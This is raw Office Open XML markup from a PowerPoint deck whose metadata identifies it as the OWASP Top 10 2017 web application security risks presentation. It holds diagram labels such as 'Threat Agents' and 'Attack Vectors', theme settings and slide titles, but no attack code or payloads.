                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35"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smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Attack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>   Vectors</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800600" y="1049628"/>
                <a:ext cx="685800" cy="428655"/>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00" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t> Technical</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>   Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="37" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="762000" y="1262418"/>
                <a:ext cx="534537" cy="123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38" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2188570" y="1262418"/>
                <a:ext cx="630830" cy="1233"/>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39" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="32" idx="3"/>
                <a:endCxn id="36" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3899848" y="1263956"/>
                <a:ext cx="900752" cy="421"/>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40" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="304800" y="1280701"/>
                <a:ext cx="516488" cy="302327"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Threat</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agents</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="41" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923128" y="1073877"/>
                <a:ext cx="762000" cy="381000"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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t"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Business</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="42" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="36" idx="4"/>
                <a:endCxn id="41" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486400" y="1263956"/>
                <a:ext cx="436728" cy="421"/>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0" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1091049"/>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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1235639"/>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8" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>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dirty="0" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </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11/11/2009" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag10.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="06/24/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag11.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2.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3.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4.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5.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6.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7.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8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/31/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag19.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag20.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/13/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/19/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag5.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/03/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/13/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/13/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/03/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
  <a:themeElements>
    <a:clrScheme name="OWASP Top 10-2017 1">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FEFFFF"/>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036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3C752E"/>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90086</TotalTime>
  <Words>8301</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>1053</Paragraphs>
  <Slides>23</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Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Mangal</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Release Candidate</vt:lpstr>
      <vt:lpstr>About OWASP</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Release Notes</vt:lpstr>
      <vt:lpstr>Application Security Risks</vt:lpstr>
      <vt:lpstr>OWASP Top 10 Application Security Risks – 2017 </vt:lpstr>
      <vt:lpstr>Injection</vt:lpstr>
      <vt:lpstr>Broken Authentication and Session Management</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Broken Access Control</vt:lpstr>
      <vt:lpstr>Security Misconfiguration</vt:lpstr>
      <vt:lpstr>Sensitive Data Exposure</vt:lpstr>
      <vt:lpstr>Insufficient Attack Protection</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Using Components with Known Vulnerabilities</vt:lpstr>
      <vt:lpstr>Underprotected APIs</vt:lpstr>
      <vt:lpstr>What’s Next for Developers</vt:lpstr>
      <vt:lpstr>What’s Next for Security Testing</vt:lpstr>
      <vt:lpstr>What’s Next for Organizations</vt:lpstr>
      <vt:lpstr>Note About Risks</vt:lpstr>
      <vt:lpstr>Details About Risk Factors</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Manager/>
  <Company>OWASP</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <SharedDoc>false</SharedDoc>
  <HyperlinkBase/>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10 - 2017</dc:title>
  <dc:subject>The Top 10 Most Critical Web Application Security Risks</dc:subject>
  <dc:creator>Dave Wichers</dc:creator>
  <cp:keywords>Web Application Security, Top 10, XSS, CSRF, SQL Injection</cp:keywords>
  <dc:description/>
  <cp:lastModifiedBy>Dave Wichers</cp:lastModifiedBy>
  <cp:revision>1402</cp:revision>
  <cp:lastPrinted>2017-04-02T18:34:02Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-17T12:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-08T16:05:22Z</dcterms:modified>
  <cp:category/>
  <cp:contentStatus>FINAL</cp:contentStatus>
</cp:coreProperties>
</file>